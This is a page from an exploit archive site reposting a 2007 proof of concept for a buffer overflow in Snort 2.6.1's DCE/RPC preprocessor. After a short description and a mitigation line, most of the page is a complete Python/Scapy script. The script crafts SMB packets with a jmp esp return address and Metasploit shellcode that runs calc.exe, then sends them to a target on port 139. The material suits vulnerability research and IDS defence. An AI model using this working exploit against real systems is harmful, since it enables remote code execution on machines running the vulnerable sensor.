Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version) - exploit.company
header-logo
Suggest Exploit
vendor:
Snort
by:
Trirat Puttaraksa
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Snort
Affected Version From: Snort 2.6.1
Affected Version To: Snort 2.6.1
Patch Exists: NO
Related CWE: No CVEs mentioned
CPE: a:snort:snort:2.6.1
Metasploit:
Other Scripts:
Platforms Tested:
Year not mentioned

Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)

This exploit is used to execute commands on Windows XP SP2 with Snort 2.6.1 installed. It utilizes a buffer overflow vulnerability in the Snort DCE/RPC Preprocessor. The exploit sends a malicious packet to the target system, causing it to execute the 'calc.exe' command.

Mitigation:

Update to a patched version of Snort or apply any necessary security patches. Additionally, ensure that the system is protected by a firewall and intrusion detection system.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)
# 
# Author: Trirat Puttaraksa <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1
#
# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) 
# to inject the packet, so you have to install Scapy before use it.
#
#######################################################

import sys
from scapy import *
from struct import pack
conf.verb = 0

# NetBIOS Session Service
payload = "\x00\x00\x02\xab"

# SMB Header
payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
payload += "\x00\x08\x30\x00"

# Tree Connect AndX Request
payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
payload += "\x3f\x3f\x3f\x3f\x3f\x00"

# NT Create AndX Request
payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
payload += "\x63\x00\x00\x00"

# Write AndX Request #1
payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"

#payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"

# Write AndX Request #2
payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
payload += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"

# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com)
payload += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"

payload += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
payload += "\xd1\x80\xf5\x83\xeb\xfc\xe2\xf4\x55\x39\xc4\xf5\xa9\xd1\x0b\xb0"
payload += "\x95\x5a\xfc\xf0\xd1\xd0\x6f\x7e\xe6\xc9\x0b\xaa\x89\xd0\x6b\xbc"
payload += "\x22\xe5\x0b\xf4\x47\xe0\x40\x6c\x05\x55\x40\x81\xae\x10\x4a\xf8"
payload += "\xa8\x13\x6b\x01\x92\x85\xa4\xf1\xdc\x34\x0b\xaa\x8d\xd0\x6b\x93"
payload += "\x22\xdd\xcb\x7e\xf6\xcd\x81\x1e\x22\xcd\x0b\xf4\x42\x58\xdc\xd1"
payload += "\xad\x12\xb1\x35\xcd\x5a\xc0\xc5\x2c\x11\xf8\xf9\x22\x91\x8c\x7e"
payload += "\xd9\xcd\x2d\x7e\xc1\xd9\x6b\xfc\x22\x51\x30\xf5\xa9\xd1\x0b\x9d"
payload += "\x95\x8e\xb1\x03\xc9\x87\x09\x0d\x2a\x11\xfb\xa5\xc1\xaf\x58\x17"
payload += "\xda\xb9\x18\x0b\x23\xdf\xd7\x0a\x4e\xb2\xe1\x99\xca\xff\xe5\x8d"
payload += "\xcc\xd1\x80\xf5"

payload += "\x90"  # padding

if len(sys.argv) != 2:
	print "Usage snort_execute_dcerpc.py <fake destination ip>"
	sys.exit(1)

target = sys.argv[1]

p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
send(p)

# milw0rm.com [2007-03-01]

Navigation

Suggest Exploit

Services By CQR